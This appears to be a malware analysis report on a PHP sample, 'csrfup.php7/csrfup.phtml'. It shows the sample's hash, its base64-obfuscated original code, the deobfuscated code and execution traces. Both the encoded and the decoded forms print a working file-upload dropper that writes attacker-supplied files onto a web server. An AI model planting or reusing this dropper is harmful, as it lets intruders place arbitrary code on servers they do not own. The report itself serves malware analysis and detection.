csrfup.php7, csrfup.phtml

md5: 77ca34ad5ae79c852637524a670fc2f9

Jump to:

Deobfuscated code (Read more)
Execution traces (Read more)
Generated HTML (Read more)
Original Code (Read more)

Screenshot
Attributes
Encoding
base64_decode (Original, Traces)

Execution
eval (Original)

Files
copy (Deobfuscated, Traces)

Input
_FILES (Deobfuscated, Traces)
_POST (Deobfuscated, Traces)

Deobfuscated PHP code
<?php

echo eval /* PHPDeobfuscator eval output */ {
    if ($_POST) {
        if (@copy($_FILES["354"]["tmp_name"], $_FILES["354"]["name"])) {
            echo "Y";
        } else {
            echo "N";
        }
    } else {
        echo "";
    }
};
Execution traces
data/traces/77ca34ad5ae79c852637524a670fc2f9_trace-1676250918.5804.xt
Version: 3.1.0beta2
File format: 4
TRACE START [2023-02-12 23:15:44.478243]
1	0	1	0.000233	393528
1	3	0	0.000285	393640	{main}	1		/var/www/html/uploads/csrfup.php7	0	0
2	4	0	0.000303	393640	base64_decode	0		/var/www/html/uploads/csrfup.php7	1	1	'PD9waHAgaWYoJF9QT1NUKXtpZihAY29weSgkX0ZJTEVTWyIzNTQiXVsidG1wX25hbWUiXSwkX0ZJTEVTWyIzNTQiXVsibmFtZSJdKSl7ZWNobyJZIjt9ZWxzZXtlY2hvIk4iO319ZWxzZXtlY2hvIiI7fT8+'
2	4	1	0.000328	393864
2	4	R			'<?php if($_POST){if(@copy($_FILES["354"]["tmp_name"],$_FILES["354"]["name"])){echo"Y";}else{echo"N";}}else{echo"";}?>'
2	5	0	0.000373	396032	eval	1	'?><?php if($_POST){if(@copy($_FILES["354"]["tmp_name"],$_FILES["354"]["name"])){echo"Y";}else{echo"N";}}else{echo"";}?>'	/var/www/html/uploads/csrfup.php7	1	0
2	5	1	0.000394	396032
2	5	R			NULL
1	3	1	0.000408	394392
			0.000440	314400
TRACE END   [2023-02-12 23:15:44.478499]

data/traces/77ca34ad5ae79c852637524a670fc2f9_trace-1676261426.3122.xt
Version: 3.1.0beta2
File format: 4
TRACE START [2023-02-13 02:10:52.210041]
1	0	1	0.000154	393528
1	3	0	0.000203	393640	{main}	1		/var/www/html/uploads/csrfup.phtml	0	0
2	4	0	0.000220	393640	base64_decode	0		/var/www/html/uploads/csrfup.phtml	1	1	'PD9waHAgaWYoJF9QT1NUKXtpZihAY29weSgkX0ZJTEVTWyIzNTQiXVsidG1wX25hbWUiXSwkX0ZJTEVTWyIzNTQiXVsibmFtZSJdKSl7ZWNobyJZIjt9ZWxzZXtlY2hvIk4iO319ZWxzZXtlY2hvIiI7fT8+'
2	4	1	0.000244	393864
2	4	R			'<?php if($_POST){if(@copy($_FILES["354"]["tmp_name"],$_FILES["354"]["name"])){echo"Y";}else{echo"N";}}else{echo"";}?>'
2	5	0	0.000284	396032	eval	1	'?><?php if($_POST){if(@copy($_FILES["354"]["tmp_name"],$_FILES["354"]["name"])){echo"Y";}else{echo"N";}}else{echo"";}?>'	/var/www/html/uploads/csrfup.phtml	1	0
2	5	1	0.000304	396032
2	5	R			NULL
1	3	1	0.000318	394392
			0.000346	314400
TRACE END   [2023-02-13 02:10:52.210266]

Generated HTML code
<html><head></head><body></body></html>
Original PHP code
<?=eval("?>".base64_decode("PD9waHAgaWYoJF9QT1NUKXtpZihAY29weSgkX0ZJTEVTWyIzNTQiXVsidG1wX25hbWUiXSwkX0ZJTEVTWyIzNTQiXVsibmFtZSJdKSl7ZWNobyJZIjt9ZWxzZXtlY2hvIk4iO319ZWxzZXtlY2hvIiI7fT8+"));?>

PHP Malware Analysis

csrfup.php7, csrfup.phtml

md5: 77ca34ad5ae79c852637524a670fc2f9

Screenshot

Attributes

Deobfuscated PHP code

Execution traces

Generated HTML code

Original PHP code